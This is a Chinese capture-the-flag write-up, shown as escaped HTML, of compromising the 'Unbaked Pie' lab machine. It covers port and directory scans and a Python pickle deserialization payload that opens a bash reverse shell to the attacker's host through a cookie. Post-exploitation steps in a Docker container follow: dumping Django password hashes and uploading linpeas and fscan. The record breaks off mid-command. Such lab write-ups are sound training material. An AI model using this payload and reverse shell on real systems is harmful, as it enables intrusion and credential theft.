![\"image-20240912141319179\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921139.png\")
<\/div>\n
![\"image-20240912175403360\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921140.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ sudo nmap -Pn $IP -sT -sC -sV\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-09-12 05:59 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.0015s latency).\nNot shown: 999 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n5003\/tcp open filemaker?\n| fingerprint-strings: \n| GetRequest: \n| HTTP\/1.1 200 OK\n| Date: Thu, 12 Sep 2024 10:00:34 GMT\n| Server: WSGIServer\/0.2 CPython\/3.8.6\n| Content-Type: text\/html; charset=utf-8\n| X-Frame-Options: DENY\n| Vary: Cookie\n| Content-Length: 7453\n| X-Content-Type-Options: nosniff\n| Referrer-Policy: same-origin\n| Set-Cookie: csrftoken=1GqVxL3Xg2RAPEUtHsTjTI70ZYNyU2xzcxzW4C4Dz6gcNtRTI9yPieGHHZ5KnmEm; expires=Thu, 11 Sep 2025 10:00:34 GMT; Max-Age=31449600; Path=\/; SameSite=Lax\n| <!DOCTYPE html>\n| <html lang="en">\n| <head>\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">\n| <meta name="description" content="">\n| <meta name="author" content="">\n| <title>[Un]baked | \/<\/title>\n| <!-- Bootstrap core CSS -->\n| <link href="\/static\/vendor\/bootstrap\/css\/bootstrap.min.css" rel="stylesheet">\n| <!-- Custom fonts for this template -->\n| <link href="\/static\/vendor\/fontawesome-free\/css\/all.min.cs\n| HTTPOptions: \n| HTTP\/1.1 200 OK\n| Date: Thu, 12 Sep 2024 10:00:34 GMT\n| Server: WSGIServer\/0.2 CPython\/3.8.6\n| Content-Type: text\/html; charset=utf-8\n| X-Frame-Options: DENY\n| Vary: Cookie\n| Content-Length: 7453\n| X-Content-Type-Options: nosniff\n| Referrer-Policy: same-origin\n| Set-Cookie: csrftoken=VQn25UJjqBTqik38fcqFs20zpMtiRU5AoJUvuyG1X06sIHUpAh29nEhJyxKLzCBw; expires=Thu, 11 Sep 2025 10:00:34 GMT; Max-Age=31449600; Path=\/; SameSite=Lax\n| <!DOCTYPE html>\n| <html lang="en">\n| <head>\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">\n| <meta name="description" content="">\n| <meta name="author" content="">\n| <title>[Un]baked | \/<\/title>\n| <!-- Bootstrap core CSS -->\n| <link href="\/static\/vendor\/bootstrap\/css\/bootstrap.min.css" rel="stylesheet">\n| <!-- Custom fonts for this template -->\n|_ <link href="\/static\/vendor\/fontawesome-free\/css\/all.min.cs\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port5003-TCP:V=7.94SVN%I=7%D=9\/12%Time=66E2BBBB%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,1EC5,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Thu,\\x2012\\x20Sep\\\nSF:x202024\\x2010:00:34\\x20GMT\\r\\nServer:\\x20WSGIServer\/0\\.2\\x20CPython\/3\\.\nSF:8\\.6\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nX-Frame-Options\nSF::\\x20DENY\\r\\nVary:\\x20Cookie\\r\\nContent-Length:\\x207453\\r\\nX-Content-Ty\nSF:pe-Options:\\x20nosniff\\r\\nReferrer-Policy:\\x20same-origin\\r\\nSet-Cookie\nSF::\\x20\\x20csrftoken=1GqVxL3Xg2RAPEUtHsTjTI70ZYNyU2xzcxzW4C4Dz6gcNtRTI9yP\nSF:ieGHHZ5KnmEm;\\x20expires=Thu,\\x2011\\x20Sep\\x202025\\x2010:00:34\\x20GMT;\\\nSF:x20Max-Age=31449600;\\x20Path=\/;\\x20SameSite=Lax\\r\\n\\r\\n\\n<!DOCTYPE\\x20h\nSF:tml>\\n<html\\x20lang=\\"en\\">\\n\\n<head>\\n\\n\\x20\\x20<meta\\x20charset=\\"utf\nSF:-8\\">\\n\\x20\\x20<meta\\x20name=\\"viewport\\"\\x20content=\\"width=device-wid\nSF:th,\\x20initial-scale=1,\\x20shrink-to-fit=no\\">\\n\\x20\\x20<meta\\x20name=\\\nSF:"description\\"\\x20content=\\"\\">\\n\\x20\\x20<meta\\x20name=\\"author\\"\\x20co\nSF:ntent=\\"\\">\\n\\n\\x20\\x20<title>\\[Un\\]baked\\x20\\|\\x20\/<\/title>\\n\\n\\x20\\x2\nSF:0<!--\\x20Bootstrap\\x20core\\x20CSS\\x20-->\\n\\x20\\x20<link\\x20href=\\"\/stat\nSF:ic\/vendor\/bootstrap\/css\/bootstrap\\.min\\.css\\"\\x20rel=\\"stylesheet\\">\\n\\\nSF:n\\x20\\x20<!--\\x20Custom\\x20fonts\\x20for\\x20this\\x20template\\x20-->\\n\\x2\nSF:0\\x20<link\\x20href=\\"\/static\/vendor\/fontawesome-free\/css\/all\\.min\\.cs")\nSF:%r(HTTPOptions,1EC5,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Thu,\\x2012\\x20S\nSF:ep\\x202024\\x2010:00:34\\x20GMT\\r\\nServer:\\x20WSGIServer\/0\\.2\\x20CPython\/\nSF:3\\.8\\.6\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nX-Frame-Opti\nSF:ons:\\x20DENY\\r\\nVary:\\x20Cookie\\r\\nContent-Length:\\x207453\\r\\nX-Content\nSF:-Type-Options:\\x20nosniff\\r\\nReferrer-Policy:\\x20same-origin\\r\\nSet-Coo\nSF:kie:\\x20\\x20csrftoken=VQn25UJjqBTqik38fcqFs20zpMtiRU5AoJUvuyG1X06sIHUpA\nSF:h29nEhJyxKLzCBw;\\x20expires=Thu,\\x2011\\x20Sep\\x202025\\x2010:00:34\\x20GM\nSF:T;\\x20Max-Age=31449600;\\x20Path=\/;\\x20SameSite=Lax\\r\\n\\r\\n\\n<!DOCTYPE\\x\nSF:20html>\\n<html\\x20lang=\\"en\\">\\n\\n<head>\\n\\n\\x20\\x20<meta\\x20charset=\\"\nSF:utf-8\\">\\n\\x20\\x20<meta\\x20name=\\"viewport\\"\\x20content=\\"width=device-\nSF:width,\\x20initial-scale=1,\\x20shrink-to-fit=no\\">\\n\\x20\\x20<meta\\x20nam\nSF:e=\\"description\\"\\x20content=\\"\\">\\n\\x20\\x20<meta\\x20name=\\"author\\"\\x2\nSF:0content=\\"\\">\\n\\n\\x20\\x20<title>\\[Un\\]baked\\x20\\|\\x20\/<\/title>\\n\\n\\x20\nSF:\\x20<!--\\x20Bootstrap\\x20core\\x20CSS\\x20-->\\n\\x20\\x20<link\\x20href=\\"\/s\nSF:tatic\/vendor\/bootstrap\/css\/bootstrap\\.min\\.css\\"\\x20rel=\\"stylesheet\\">\nSF:\\n\\n\\x20\\x20<!--\\x20Custom\\x20fonts\\x20for\\x20this\\x20template\\x20-->\\n\nSF:\\x20\\x20<link\\x20href=\\"\/static\/vendor\/fontawesome-free\/css\/all\\.min\\.c\nSF:s");<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP:5003 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 3 -s 200 301 302\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.10.4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/192.168.10.101:5003\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.10.4\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 3\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n200 GET 165l 384w 5457c http:\/\/192.168.10.101:5003\/german-chocolate-pie\n200 GET 7l 1029w 81084c http:\/\/192.168.10.101:5003\/static\/vendor\/bootstrap\/js\/bootstrap.bundle.min.js\n200 GET 5l 83w 58578c http:\/\/192.168.10.101:5003\/static\/vendor\/fontawesome-free\/css\/all.min.css\n200 GET 7l 26w 1092c http:\/\/192.168.10.101:5003\/static\/js\/clean-blog.min.js\n200 GET 157l 433w 5619c http:\/\/192.168.10.101:5003\/blueberry-pie\n200 GET 162l 511w 6150c http:\/\/192.168.10.101:5003\/homemade-pickle\n200 GET 141l 343w 4949c http:\/\/192.168.10.101:5003\/about\n200 GET 323l 1639w 150557c http:\/\/192.168.10.101:5003\/media\/apple-pie.jpg\n200 GET 5l 169w 6376c http:\/\/192.168.10.101:5003\/static\/css\/clean-blog.min.css\n200 GET 163l 488w 5958c http:\/\/192.168.10.101:5003\/pickle-pie\n200 GET 366l 2045w 188693c http:\/\/192.168.10.101:5003\/media\/bluberry-pie.jpg\n200 GET 2l 1297w 89476c http:\/\/192.168.10.101:5003\/static\/vendor\/jquery\/jquery.min.js\n200 GET 7l 2102w 160403c http:\/\/192.168.10.101:5003\/static\/vendor\/bootstrap\/css\/bootstrap.min.css\n200 GET 832l 3648w 310445c http:\/\/192.168.10.101:5003\/media\/429048911_6028786357001_6028781673001-vs.jpg\n200 GET 0l 0w 78946c http:\/\/192.168.10.101:5003\/media\/best-homemade-refrigerator-pickles-21.jpg\n200 GET 0l 0w 201616c http:\/\/192.168.10.101:5003\/media\/germanchocolatepie.jpg\n200 GET 225l 514w 7453c http:\/\/192.168.10.101:5003\/\n301 GET 0l 0w 0c http:\/\/192.168.10.101:5003\/accounts\/signup => http:\/\/192.168.10.101:5003\/accounts\/signup\/\n301 GET 0l 0w 0c http:\/\/192.168.10.101:5003\/accounts\/login => http:\/\/192.168.10.101:5003\/accounts\/login\/\n302 GET 0l 0w 0c http:\/\/192.168.10.101:5003\/share => accounts\/login?next=\/share<\/code><\/pre>\n\u6ca1\u6709\u7ee7\u7eed\u626b\u4e0b\u53bb\u4e86\uff0c\u5982\u679c\u7b49\u4e00\u4e0b\u627e\u4e0d\u5230\u7a81\u7834\u53e3\u518d\u626b\u63cf\u5427\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ curl -is http:\/\/$IP:5003 \nHTTP\/1.1 200 OK\nDate: Thu, 12 Sep 2024 10:01:23 GMT\nServer: WSGIServer\/0.2 CPython\/3.8.6\nContent-Type: text\/html; charset=utf-8\nX-Frame-Options: DENY\nVary: Cookie\nContent-Length: 7453\nX-Content-Type-Options: nosniff\nReferrer-Policy: same-origin\nSet-Cookie: csrftoken=sLJZaCVfzmB8xU5b8mxMAn3yTVyJQUVPDKwW5QhJ1ujLJRXGlcycTmP8c7n4zMp9; expires=Thu, 11 Sep 2025 10:01:23 GMT; Max-Age=31449600; Path=\/; SameSite=Lax\n\n<!DOCTYPE html>\n<html lang="en">\n\n<head>\n\n <meta charset="utf-8">\n <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <title>[Un]baked | \/<\/title>\n\n <!-- Bootstrap core CSS -->\n .................\n <!-- Bootstrap core JavaScript -->\n <script src="\/static\/vendor\/jquery\/jquery.min.js"><\/script>\n <script src="\/static\/vendor\/bootstrap\/js\/bootstrap.bundle.min.js"><\/script>\n\n <!-- Custom scripts for this template -->\n <script src="\/static\/js\/clean-blog.min.js"><\/script>\n\n<\/body>\n\n<\/html><\/code><\/pre>\n![\"image-20240912180246579\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5c1d\u8bd5\u641c\u7d22\uff0c\u53d1\u73b0\u6e90\u4ee3\u7801\u6570\u636e\u975e\u5e38\u591a\uff0c\u8fd8\u6709\u4e0d\u5c11\u7684\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\npickle \u53cd\u5e8f\u5217\u5316\uff1f<\/p>\n
<\/div><\/p>\n\u77e5\u9053\u4e86\u7248\u672c\u4fe1\u606f\uff0cDjango Version: 3.1.2 Python Version: 3.8.6<\/code><\/p>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e86\u4e00\u4e2acookie\uff1f<\/p>\n
# gASVCAAAAAAAAACMBHRlc3SULg==\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ echo 'gASVCAAAAAAAAACMBHRlc3SULg==' | base64 -d \n\ufffd\ufffdtest\ufffd.<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0bpickle<\/code>\u53cd\u5e8f\u5217\u5316\uff0c\u770b\u662f\u5426\u548c\u4e0a\u9762\u8868\u793a\u4e00\u6837\uff01<\/p>\nimport pickle\nimport base64\nimport os\n\nclass PickleCommandExec:\n def __reduce__(self):\n command = ('test')\n return os.system, (command,)\n\nif __name__ == '__main__':\n pickled = pickle.dumps(PickleCommandExec())\n print(base64.urlsafe_b64encode(pickled))\n\n# b'gASVHwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAR0ZXN0lIWUUpQu'<\/code><\/pre>\n\u770b\u4e0a\u53bb\u8fd8\u86ee\u50cf\u7684\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\uff01<\/p>\n
import pickle\nimport base64\nimport os\n\nclass PickleCommandExec:\n def __reduce__(self):\n command = ('bash -c "exec bash -i &>\/dev\/tcp\/192.168.10.102\/1234 <&1"')\n return os.system, (command,)\n\nif __name__ == '__main__':\n pickled = pickle.dumps(PickleCommandExec())\n print(base64.urlsafe_b64encode(pickled))\n# b'gASVVAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDliYXNoIC1jICJleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjEwLjEwMi8xMjM0IDwmMSKUhZRSlC4='<\/code><\/pre>\n\u5c1d\u8bd5\u6fc0\u6d3b\u4e00\u4e0b\uff1a<\/p>\n
curl -is http:\/\/$IP:5003\/search -b "search_cookie=gASVVAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDliYXNoIC1jICJleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjEwLjEwMi8xMjM0IDwmMSKUhZRSlC4="<\/code><\/pre>\n<\/div><\/p>\n\u4e00\u6b65\u5230\u4f4d\uff1f<\/p>\n
\u63d0\u6743<\/h2>\ndocker\u9003\u9038<\/h3>\n(remote) root@8b39a559b296:\/home# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n(remote) root@8b39a559b296:\/home# cd \/root\n(remote) root@8b39a559b296:\/root# ls -la\ntotal 36\ndrwx------ 1 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 ..\n-rw------- 1 root root 805 Oct 5 2020 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Oct 3 2020 .cache\ndrwxr-xr-x 3 root root 4096 Oct 3 2020 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 0 Sep 24 2020 .python_history\ndrwx------ 2 root root 4096 Oct 3 2020 .ssh\n-rw-r--r-- 1 root root 254 Oct 3 2020 .wget-hsts\n(remote) root@8b39a559b296:\/root# cat .bash_history \nnc\nexit\nifconfig\nip addr\nssh 172.17.0.1\nssh 172.17.0.2\nexit\nssh ramsey@172.17.0.1\nexit\ncd \/tmp\nwget https:\/\/raw.githubusercontent.com\/moby\/moby\/master\/contrib\/check-config.sh\nchmod +x check-config.sh\n.\/check-config.sh \nnano \/etc\/default\/grub\nvi \/etc\/default\/grub\napt install vi\napt update\napt install vi\napt install vim\napt install nano\nnano \/etc\/default\/grub\ngrub-update\napt install grub-update\napt-get install --reinstall grub\ngrub-update\nexit\nssh ramsey@172.17.0.1\nexit\nssh ramsey@172.17.0.1\nexit\nls\ncd site\/\nls\ncd bakery\/\nls\nnano settings.py \nexit\nls\ncd site\/\nls\ncd bakery\/\nnano settings.py \nexit\napt remove --purge ssh\nssh\napt remove --purge autoremove open-ssh*\napt remove --purge autoremove openssh=*\napt remove --purge autoremove openssh-*\nssh\napt autoremove openssh-client\nclear\nssh\nssh\nssh\nexit\n(remote) root@8b39a559b296:\/root# cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n(remote) root@8b39a559b296:\/root# ls -la \/home\ntotal 28\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 ..\ndrwxrwxr-x 8 root root 4096 Oct 3 2020 .git\ndrwxrwxr-x 2 root root 4096 Oct 3 2020 .vscode\n-rwxrwxr-x 1 root root 95 Oct 3 2020 requirements.sh\n-rwxrwxr-x 1 root root 46 Oct 3 2020 run.sh\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 site\n(remote) root@8b39a559b296:\/root# cd \/home\n(remote) root@8b39a559b296:\/home# cat run.sh \npython3 site\/manage.py runserver 0.0.0.0:5003<\/code><\/pre>\n\u53d1\u73b0\u4e00\u5904ramsey@172.17.0.1<\/code>\uff0c\u53ef\u80fd\u7528\u5f97\u4e0a\uff1a<\/p>\n\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\uff1a<\/p>\n(remote) root@8b39a559b296:\/home# cd \/tmp\n(remote) root@8b39a559b296:\/tmp# \n(local) pwncat$ local pwd\n\/home\/kali\/temp\/UnbakedPie\n(local) pwncat$ lcd ..\n(local) pwncat$ lpwd\n\/home\/kali\/temp\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[06:38:54] uploaded 860.55KiB in 1.80 seconds upload.py:76\n(local) pwncat$ \n(remote) root@8b39a559b296:\/tmp# chmod +x *\n(remote) root@8b39a559b296:\/tmp# .\/linpeas.sh <\/code><\/pre>\n<\/div><\/p>\n\u53d1\u73b0\u6211\u4eec\u5728\u4e00\u5904docker\u5bb9\u5668\u91cc\u9762\uff0c\u5c1d\u8bd5\u9003\u9038\uff0c\u5bfb\u627e\u76f8\u5173\u4fe1\u606f\uff0c\u53d1\u73b0\u5b58\u5728\u5f88\u591a\u7684\u6f0f\u6d1e\uff0c\u4f8b\u5982MARKDOWN_HASHc5068b7c2b1707f8939b283a2758a691MARKDOWNHASH<\/code>\u53ef\u5199\u4e4b\u7c7b\u7684\uff0c\u4f46\u662f\u5bf9\u6211\u4eec\u4e0b\u4e00\u6b65\u6ca1\u5e2e\u52a9(*\\^<\/em>^*)\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8bfb\u53d6\u4e00\u4e0b\u8fd9\u4e2a\u6570\u636e\u5e93\uff1a<\/p>\n
(remote) root@8b39a559b296:\/tmp# cd \/home\/site\n(remote) root@8b39a559b296:\/home\/site# ls -la\ntotal 184\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 ..\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 account\ndrwxrwxr-x 8 root root 4096 Oct 3 2020 assets\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 bakery\n-rw-r--r-- 1 root root 151552 Oct 3 2020 db.sqlite3\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 homepage\n-rwxrwxr-x 1 root root 662 Oct 3 2020 manage.py\ndrwxrwxr-x 2 root root 4096 Oct 3 2020 media\ndrwxrwxr-x 3 root root 4096 Oct 3 2020 templates\n(remote) root@8b39a559b296:\/home\/site# sqlite3 db.sqlite3\nbash: sqlite3: command not found<\/code><\/pre>\n\u4e0b\u8f7d\u5230\u672c\u5730\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ sqlite3 db.sqlite3 \nSQLite version 3.45.1 2024-01-30 16:01:20\nEnter ".help" for usage hints.\nsqlite> .tables\nauth_group django_admin_log \nauth_group_permissions django_content_type \nauth_permission django_migrations \nauth_user django_session \nauth_user_groups homepage_article \nauth_user_user_permissions\nsqlite> select * from auth_user\n ...> ;\n1|pbkdf2_sha256$216000$3fIfQIweKGJy$xFHY3JKtPDdn\/AktNbAwFKMQnBlrXnJyU04GElJKxEo=|2020-10-03 10:43:47.229292|1|aniqfakhrul|||1|1|2020-10-02 04:50:52.424582|\n11|pbkdf2_sha256$216000$0qA6zNH62sfo$8ozYcSpOaUpbjPJz82yZRD26ZHgaZT8nKWX+CU0OfRg=|2020-10-02 10:16:45.805533|0|testing|||0|1|2020-10-02 10:16:45.686339|\n12|pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO\/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=|2020-10-03 10:44:10.758867|0|ramsey|||0|1|2020-10-02 14:42:44.388799|\n13|pbkdf2_sha256$216000$Em73rE2NCRmU$QtK5Tp9+KKoP00\/QV4qhF3TWIi8Ca2q5gFCUdjqw8iE=|2020-10-02 14:42:59.192571|0|oliver|||0|1|2020-10-02 14:42:59.113998|\n14|pbkdf2_sha256$216000$oFgeDrdOtvBf$ssR\/aID947L0jGSXRrPXTGcYX7UkEBqWBzC+Q2Uq+GY=|2020-10-02 14:43:15.187554|0|wan|||0|1|2020-10-02 14:43:15.102863|\nsqlite> select username, password from auth_user;\naniqfakhrul|pbkdf2_sha256$216000$3fIfQIweKGJy$xFHY3JKtPDdn\/AktNbAwFKMQnBlrXnJyU04GElJKxEo=\ntesting|pbkdf2_sha256$216000$0qA6zNH62sfo$8ozYcSpOaUpbjPJz82yZRD26ZHgaZT8nKWX+CU0OfRg=\nramsey|pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO\/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=\noliver|pbkdf2_sha256$216000$Em73rE2NCRmU$QtK5Tp9+KKoP00\/QV4qhF3TWIi8Ca2q5gFCUdjqw8iE=\nwan|pbkdf2_sha256$216000$oFgeDrdOtvBf$ssR\/aID947L0jGSXRrPXTGcYX7UkEBqWBzC+Q2Uq+GY=<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u5bc6\u7801\uff0c\u4f46\u662f\u672a\u679c\u3002\u53c2\u8003\u58a8\u5e08\u5085\u7684blog\uff0c\u4f7f\u7528 fscan<\/code>\u5b8c\u6210ssh\u63a5\u4e0b\u6765\u7684\u5de5\u4f5c\uff1ahttps:\/\/github.com\/shadow1ng\/fscan\/releases\/download\/1.8.4\/fscan.exe<\/a><\/p>\n(remote) root@8b39a559b296:\/tmp# nc -znv 172.17.0.1 22\n(UNKNOWN) [172.17.0.1] 22 (ssh) open\n(remote) root@8b39a559b296:\/tmp# nc -znv 172.17.0.1 1-65535\n(UNKNOWN) [172.17.0.1] 5003 (?) open\n(UNKNOWN) [172.17.0.1] 22 (ssh) open<\/code><\/pre>\n\u8bf4\u660e22<\/code>\u7aef\u53e3\u53ea\u5141\u8bb8\u5185\u90e8\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n(remote) root@8b39a559b296:\/tmp# \n(local) pwncat$ lcd ..\n(local) pwncat$ upload fscan\n.\/fscan \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 24.8\/24.8 MB \u2022 3.6 MB\/s \u2022 0:00:00[06:57:41] uploaded 24.76MiB in 8.24 seconds upload.py:76\n(local) pwncat$ \n(remote) root@8b39a559b296:\/tmp# chmod +x *\\\n(remote) root@8b39a559b296:\/tmp# 